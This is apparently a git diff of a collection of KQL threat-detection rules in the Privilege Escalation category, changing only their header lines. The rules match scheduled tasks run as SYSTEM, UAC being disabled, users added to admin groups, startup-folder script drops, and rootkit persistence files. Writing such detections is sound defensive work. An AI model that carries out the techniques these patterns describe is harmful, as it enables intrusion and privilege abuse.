Escalation/suspicious_schtasks_schedule_type_with_high_privileges.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Schtasks Schedule Type With High Privileges -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-31 -// Level: medium -// Description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 -// False Positives: -// - Some installers were seen using this method of creation unfortunately. Filter them in your environment - -DeviceProcessEvents +// Title: Suspicious Schtasks Schedule Type With High Privileges +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-31 +// Level: medium +// Description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 +// False Positives: +// - Some installers were seen using this method of creation unfortunately. Filter them in your environment + +DeviceProcessEvents | where (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM" or ProcessCommandLine contains "HIGHEST") and (ProcessCommandLine contains " ONLOGON " or ProcessCommandLine contains " ONSTART " or ProcessCommandLine contains " ONCE " or ProcessCommandLine contains " ONIDLE ") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_types.kql b/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_types.kql index 2b840393..8cc509c2 100644 --- a/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_types.kql +++ b/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_types.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Schtasks Schedule Types -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-09 -// Level: high -// Description: Detects scheduled task creations or modification on a suspicious schedule type -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 -// False Positives: -// - Legitimate processes that run at logon. Filter according to your environment - -DeviceProcessEvents +// Title: Suspicious Schtasks Schedule Types +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-09 +// Level: high +// Description: Detects scheduled task creations or modification on a suspicious schedule type +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 +// False Positives: +// - Legitimate processes that run at logon. Filter according to your environment + +DeviceProcessEvents | where ((FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains " ONLOGON " or ProcessCommandLine contains " ONSTART " or ProcessCommandLine contains " ONCE " or ProcessCommandLine contains " ONIDLE ")) and (not((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM" or ProcessCommandLine contains "HIGHEST"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql b/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql index 549a2d51..1dbaae77 100644 --- a/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql +++ b/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql @@ -1,11 +1,11 @@ -// Title: Suspicious Screensaver Binary File Creation -// Author: frack113 -// Date: 2021-12-29 -// Level: medium -// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity. -// Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.002 - -DeviceFileEvents +// Title: Suspicious Screensaver Binary File Creation +// Author: frack113 +// Date: 2021-12-29 +// Level: medium +// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity. +// Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.002 + +DeviceFileEvents | where FolderPath endswith ".scr" and (not(((InitiatingProcessFolderPath endswith "\\Kindle.exe" or InitiatingProcessFolderPath endswith "\\Bin\\ccSvcHst.exe") or (InitiatingProcessFolderPath endswith "\\TiWorker.exe" and FolderPath endswith "\\uwfservicingscr.scr")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql b/KQL/rules/Privilege Escalation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql index ca67fbfe..3631267b 100644 --- a/KQL/rules/Privilege Escalation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql +++ b/KQL/rules/Privilege Escalation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Service DACL Modification Via Set-Service Cmdlet -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-18 -// Level: high -// Description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003 - -DeviceProcessEvents +// Title: Suspicious Service DACL Modification Via Set-Service Cmdlet +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-18 +// Level: high +// Description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003 + +DeviceProcessEvents | where (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and ((ProcessCommandLine contains ";;;IU" or ProcessCommandLine contains ";;;SU" or ProcessCommandLine contains ";;;BA" or ProcessCommandLine contains ";;;SY" or ProcessCommandLine contains ";;;WD") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "D;;")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_shim_database_patching_activity.kql b/KQL/rules/Privilege Escalation/suspicious_shim_database_patching_activity.kql index 4c4db164..e5929ec1 100644 --- a/KQL/rules/Privilege Escalation/suspicious_shim_database_patching_activity.kql +++ b/KQL/rules/Privilege Escalation/suspicious_shim_database_patching_activity.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Shim Database Patching Activity -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-01 -// Level: high -// Description: Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011 - -DeviceRegistryEvents +// Title: Suspicious Shim Database Patching Activity +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-01 +// Level: high +// Description: Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011 + +DeviceRegistryEvents | where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom*" and (RegistryKey endswith "\\csrss.exe" or RegistryKey endswith "\\dllhost.exe" or RegistryKey endswith "\\explorer.exe" or RegistryKey endswith "\\RuntimeBroker.exe" or RegistryKey endswith "\\services.exe" or RegistryKey endswith "\\sihost.exe" or RegistryKey endswith "\\svchost.exe" or RegistryKey endswith "\\taskhostw.exe" or RegistryKey endswith "\\winlogon.exe" or RegistryKey endswith "\\WmiPrvSe.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql b/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql index afbe4a05..832de81f 100644 --- a/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql +++ b/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql @@ -1,14 +1,14 @@ -// Title: Suspicious Startup Folder Persistence -// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2022-08-10 -// Level: high -// Description: Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors. -// These files (.ps1, .vbs, .js, .bat, etc.) are automatically executed when a user logs in, making the Startup folder an attractive target for attackers. -// This technique is frequently observed in malvertising campaigns and malware distribution where attackers attempt to maintain long-term access to compromised systems. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.t1204.002, attack.persistence, attack.t1547.001 -// False Positives: -// - Rare legitimate usage of some of the extensions mentioned in the rule - -DeviceFileEvents +// Title: Suspicious Startup Folder Persistence +// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2022-08-10 +// Level: high +// Description: Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors. +// These files (.ps1, .vbs, .js, .bat, etc.) are automatically executed when a user logs in, making the Startup folder an attractive target for attackers. +// This technique is frequently observed in malvertising campaigns and malware distribution where attackers attempt to maintain long-term access to compromised systems. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.t1204.002, attack.persistence, attack.t1547.001 +// False Positives: +// - Rare legitimate usage of some of the extensions mentioned in the rule + +DeviceFileEvents | where FolderPath contains "\\Windows\\Start Menu\\Programs\\Startup\\" and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".dll" or FolderPath endswith ".hta" or FolderPath endswith ".jar" or FolderPath endswith ".js" or FolderPath endswith ".jse" or FolderPath endswith ".msi" or FolderPath endswith ".ps1" or FolderPath endswith ".psd1" or FolderPath endswith ".psm1" or FolderPath endswith ".scr" or FolderPath endswith ".url" or FolderPath endswith ".vba" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_userinit_child_process.kql b/KQL/rules/Privilege Escalation/suspicious_userinit_child_process.kql index 8892aae9..fbb6d960 100644 --- a/KQL/rules/Privilege Escalation/suspicious_userinit_child_process.kql +++ b/KQL/rules/Privilege Escalation/suspicious_userinit_child_process.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Userinit Child Process -// Author: Florian Roth (Nextron Systems), Samir Bousseaden (idea) -// Date: 2019-06-17 -// Level: medium -// Description: Detects a suspicious child process of userinit -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055 -// False Positives: -// - Administrative scripts - -DeviceProcessEvents +// Title: Suspicious Userinit Child Process +// Author: Florian Roth (Nextron Systems), Samir Bousseaden (idea) +// Date: 2019-06-17 +// Level: medium +// Description: Detects a suspicious child process of userinit +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055 +// False Positives: +// - Administrative scripts + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\userinit.exe" and (not(((FolderPath endswith "\\explorer.exe" or ProcessVersionInfoOriginalFileName =~ "explorer.exe" or ProcessCommandLine =~ "C:\\Windows\\Explorer.EXE") or ProcessCommandLine contains "\\netlogon\\" or isnull(FolderPath)))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/sysinternals_psservice_execution.kql b/KQL/rules/Privilege Escalation/sysinternals_psservice_execution.kql index 3e913122..17ebc6de 100644 --- a/KQL/rules/Privilege Escalation/sysinternals_psservice_execution.kql +++ b/KQL/rules/Privilege Escalation/sysinternals_psservice_execution.kql @@ -1,12 +1,12 @@ -// Title: Sysinternals PsService Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-16 -// Level: medium -// Description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.discovery, attack.persistence, attack.t1543.003 -// False Positives: -// - Legitimate use of PsService by an administrator - -DeviceProcessEvents +// Title: Sysinternals PsService Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-16 +// Level: medium +// Description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.discovery, attack.persistence, attack.t1543.003 +// False Positives: +// - Legitimate use of PsService by an administrator + +DeviceProcessEvents | where ProcessVersionInfoOriginalFileName =~ "psservice.exe" or (FolderPath endswith "\\PsService.exe" or FolderPath endswith "\\PsService64.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/sysinternals_pssuspend_execution.kql b/KQL/rules/Privilege Escalation/sysinternals_pssuspend_execution.kql index 6bdb231f..f133c883 100644 --- a/KQL/rules/Privilege Escalation/sysinternals_pssuspend_execution.kql +++ b/KQL/rules/Privilege Escalation/sysinternals_pssuspend_execution.kql @@ -1,10 +1,10 @@ -// Title: Sysinternals PsSuspend Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-23 -// Level: medium -// Description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.discovery, attack.persistence, attack.t1543.003 - -DeviceProcessEvents +// Title: Sysinternals PsSuspend Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-23 +// Level: medium +// Description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.discovery, attack.persistence, attack.t1543.003 + +DeviceProcessEvents | where ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/system_scripts_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/system_scripts_autorun_keys_modification.kql index 217ecf3a..cf332362 100644 --- a/KQL/rules/Privilege Escalation/system_scripts_autorun_keys_modification.kql +++ b/KQL/rules/Privilege Escalation/system_scripts_autorun_keys_modification.kql @@ -1,13 +1,13 @@ -// Title: System Scripts Autorun Keys Modification -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019-10-25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: -// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason -// - Legitimate administrator sets up autorun keys for legitimate reason - -DeviceRegistryEvents +// Title: System Scripts Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents | where RegistryKey contains "\\Software\\Policies\\Microsoft\\Windows\\System\\Scripts" and (RegistryKey contains "\\Startup" or RegistryKey contains "\\Shutdown" or RegistryKey contains "\\Logon" or RegistryKey contains "\\Logoff") and (not(RegistryValueData =~ "(Empty)")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql b/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql index 4303ff41..45b379a0 100644 --- a/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql +++ b/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql @@ -1,12 +1,12 @@ -// Title: Tasks Folder Evasion -// Author: Sreeman -// Date: 2020-01-13 -// Level: high -// Description: The Tasks folder in system32 and syswow64 are globally writable paths. -// Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application -// in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.execution, attack.t1574.001 - -DeviceProcessEvents +// Title: Tasks Folder Evasion +// Author: Sreeman +// Date: 2020-01-13 +// Level: high +// Description: The Tasks folder in system32 and syswow64 are globally writable paths. +// Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application +// in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.execution, attack.t1574.001 + +DeviceProcessEvents | where (ProcessCommandLine contains "echo " or ProcessCommandLine contains "copy " or ProcessCommandLine contains "type " or ProcessCommandLine contains "file createnew") and (ProcessCommandLine contains " C:\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains " C:\\Windows\\SysWow64\\Tasks\\") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/triple_cross_ebpf_rootkit_default_persistence.kql b/KQL/rules/Privilege Escalation/triple_cross_ebpf_rootkit_default_persistence.kql index 516509cd..7d60d5c1 100644 --- a/KQL/rules/Privilege Escalation/triple_cross_ebpf_rootkit_default_persistence.kql +++ b/KQL/rules/Privilege Escalation/triple_cross_ebpf_rootkit_default_persistence.kql @@ -1,12 +1,12 @@ -// Title: Triple Cross eBPF Rootkit Default Persistence -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-05 -// Level: high -// Description: Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.defense-evasion, attack.t1053.003 -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: Triple Cross eBPF Rootkit Default Persistence +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-05 +// Level: high +// Description: Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.defense-evasion, attack.t1053.003 +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath endswith "ebpfbackdoor" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/trustedpath_uac_bypass_pattern.kql b/KQL/rules/Privilege Escalation/trustedpath_uac_bypass_pattern.kql index 39e864a4..a79e662c 100644 --- a/KQL/rules/Privilege Escalation/trustedpath_uac_bypass_pattern.kql +++ b/KQL/rules/Privilege Escalation/trustedpath_uac_bypass_pattern.kql @@ -1,10 +1,10 @@ -// Title: TrustedPath UAC Bypass Pattern -// Author: Florian Roth (Nextron Systems) -// Date: 2021-08-27 -// Level: critical -// Description: Detects indicators of a UAC bypass method by mocking directories -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 - -DeviceProcessEvents +// Title: TrustedPath UAC Bypass Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2021-08-27 +// Level: critical +// Description: Detects indicators of a UAC bypass method by mocking directories +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 + +DeviceProcessEvents | where FolderPath contains "C:\\Windows \\System32\\" or FolderPath contains "C:\\Windows \\SysWOW64\\" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/uac_disabled.kql b/KQL/rules/Privilege Escalation/uac_disabled.kql index e9051e8b..170acc2d 100644 --- a/KQL/rules/Privilege Escalation/uac_disabled.kql +++ b/KQL/rules/Privilege Escalation/uac_disabled.kql @@ -1,10 +1,10 @@ -// Title: UAC Disabled -// Author: frack113 -// Date: 2022-01-05 -// Level: medium -// Description: Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 - -DeviceRegistryEvents +// Title: UAC Disabled +// Author: frack113 +// Date: 2022-01-05 +// Level: medium +// Description: Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/uac_notification_disabled.kql b/KQL/rules/Privilege Escalation/uac_notification_disabled.kql index b9ef9d72..6a4f12e4 100644 --- a/KQL/rules/Privilege Escalation/uac_notification_disabled.kql +++ b/KQL/rules/Privilege Escalation/uac_notification_disabled.kql @@ -1,12 +1,12 @@ -// Title: UAC Notification Disabled -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-05-10 -// Level: medium -// Description: Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value. -// UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. -// When "UACDisableNotify" is set to 1, UAC prompts are suppressed. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 - -DeviceRegistryEvents +// Title: UAC Notification Disabled +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-05-10 +// Level: medium +// Description: Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value. +// UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. +// When "UACDisableNotify" is set to 1, UAC prompts are suppressed. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\Security Center\\UACDisableNotify" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql b/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql index b57657bf..5c2b5725 100644 --- a/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql +++ b/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql @@ -1,12 +1,12 @@ -// Title: UAC Secure Desktop Prompt Disabled -// Author: frack113 -// Date: 2024-05-10 -// Level: medium -// Description: Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value. -// The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts. -// When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 - -DeviceRegistryEvents +// Title: UAC Secure Desktop Prompt Disabled +// Author: frack113 +// Date: 2024-05-10 +// Level: medium +// Description: Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value. +// The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts. +// When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/uncommon_userinit_child_process.kql b/KQL/rules/Privilege Escalation/uncommon_userinit_child_process.kql index d358013c..94bb8041 100644 --- a/KQL/rules/Privilege Escalation/uncommon_userinit_child_process.kql +++ b/KQL/rules/Privilege Escalation/uncommon_userinit_child_process.kql @@ -1,12 +1,12 @@ -// Title: Uncommon Userinit Child Process -// Author: Tom Ueltschi (@c_APT_ure), Tim Shelton -// Date: 2019-01-12 -// Level: high -// Description: Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.t1037.001, attack.persistence -// False Positives: -// - Legitimate logon scripts or custom shells may trigger false positives. Apply additional filters accordingly. - -DeviceProcessEvents +// Title: Uncommon Userinit Child Process +// Author: Tom Ueltschi (@c_APT_ure), Tim Shelton +// Date: 2019-01-12 +// Level: high +// Description: Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1037.001, attack.persistence +// False Positives: +// - Legitimate logon scripts or custom shells may trigger false positives. Apply additional filters accordingly. + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\userinit.exe" and (not(FolderPath endswith ":\\WINDOWS\\explorer.exe")) and (not(((FolderPath endswith ":\\Program Files (x86)\\Citrix\\HDX\\bin\\cmstart.exe" or FolderPath endswith ":\\Program Files (x86)\\Citrix\\HDX\\bin\\icast.exe" or FolderPath endswith ":\\Program Files (x86)\\Citrix\\System32\\icast.exe" or FolderPath endswith ":\\Program Files\\Citrix\\HDX\\bin\\cmstart.exe" or FolderPath endswith ":\\Program Files\\Citrix\\HDX\\bin\\icast.exe" or FolderPath endswith ":\\Program Files\\Citrix\\System32\\icast.exe") or isnull(FolderPath) or (ProcessCommandLine contains "netlogon.bat" or ProcessCommandLine contains "UsrLogon.cmd") or (FolderPath endswith ":\\Windows\\System32\\proquota.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\proquota.exe") or ProcessCommandLine =~ "PowerShell.exe"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/user_added_to_highly_privileged_group.kql b/KQL/rules/Privilege Escalation/user_added_to_highly_privileged_group.kql index 6eceee37..644ac225 100644 --- a/KQL/rules/Privilege Escalation/user_added_to_highly_privileged_group.kql +++ b/KQL/rules/Privilege Escalation/user_added_to_highly_privileged_group.kql @@ -1,12 +1,12 @@ -// Title: User Added To Highly Privileged Group -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-02-23 -// Level: high -// Description: Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember". -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1098 -// False Positives: -// - Administrative activity that must be investigated - -DeviceProcessEvents +// Title: User Added To Highly Privileged Group +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-23 +// Level: high +// Description: Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember". +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1098 +// False Positives: +// - Administrative activity that must be investigated + +DeviceProcessEvents | where (ProcessCommandLine contains "Group Policy Creator Owners" or ProcessCommandLine contains "Schema Admins") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group ")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/user_added_to_local_administrators_group.kql b/KQL/rules/Privilege Escalation/user_added_to_local_administrators_group.kql index 0af8a856..5d365188 100644 --- a/KQL/rules/Privilege Escalation/user_added_to_local_administrators_group.kql +++ b/KQL/rules/Privilege Escalation/user_added_to_local_administrators_group.kql @@ -1,12 +1,12 @@ -// Title: User Added to Local Administrators Group -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-12 -// Level: medium -// Description: Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember". -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1098 -// False Positives: -// - Administrative activity - -DeviceProcessEvents +// Title: User Added to Local Administrators Group +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-12 +// Level: medium +// Description: Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember". +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1098 +// False Positives: +// - Administrative activity + +DeviceProcessEvents | where (ProcessCommandLine contains " administrators " or ProcessCommandLine contains " administrateur") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group ")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/user_added_to_root_sudoers_group_using_usermod.kql b/KQL/rules/Privilege Escalation/user_added_to_root_sudoers_group_using_usermod.kql index a7b88820..188348f0 100644 --- a/KQL/rules/Privilege Escalation/user_added_to_root_sudoers_group_using_usermod.kql +++ b/KQL/rules/Privilege Escalation/user_added_to_root_sudoers_group_using_usermod.kql @@ -1,12 +1,12 @@ -// Title: User Added To Root/Sudoers Group Using Usermod -// Author: TuanLe (GTSC) -// Date: 2022-12-21 -// Level: medium -// Description: Detects 